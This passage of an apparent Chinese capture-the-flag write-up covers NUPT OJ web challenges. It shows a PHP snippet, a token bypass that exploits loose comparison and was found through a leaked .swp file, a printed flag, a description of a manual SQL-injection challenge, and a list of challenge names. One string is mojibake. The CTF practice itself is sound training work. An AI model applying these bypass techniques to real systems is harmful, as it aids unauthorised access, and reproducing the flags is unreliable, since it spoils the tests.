    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "澶辫触浜嗗憖";
    }
}

关键代码：

if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');

令token=0000000000,就出来了，考的就是找个.swp文件。
flag:nctf{thanks_to_cumt_bxs}
nctf{thanks_to_cumt_bxs}

注入实战1

请使用firefox浏览器，并安装hackbar插件（自行百度并熟悉）
目标网址：地址
flag为管理员密码的32位md5(小写)
并且加上nctf{}

手注教程群里面发过。
看不懂的话自行百度"mysql手动注入"查阅相关文章

PS:用sqlmap等工具做的就不要厚脸皮提交了

好像完蛋了,参考文章

[南邮OJ]Web

签到2

这题不是WEB

层层递进

单身二十年

综合题

pass check

Header

文件包含

单身一百年也没用

Download~!

COOKIE

MYSQL

md5 collision

bypass again

PHP是世界上最好的语言

SQL注入1

/x00

变量覆盖

上传绕过

起名字真难

sql injection 3

密码重置

sql injection 4

你从哪里来

AAencode

php 反序列化

SQL注入2

综合题2

1. SQL注入

2. 开始登陆, Getshell

密码重置2

注入实战1

猜你喜欢

热点阅读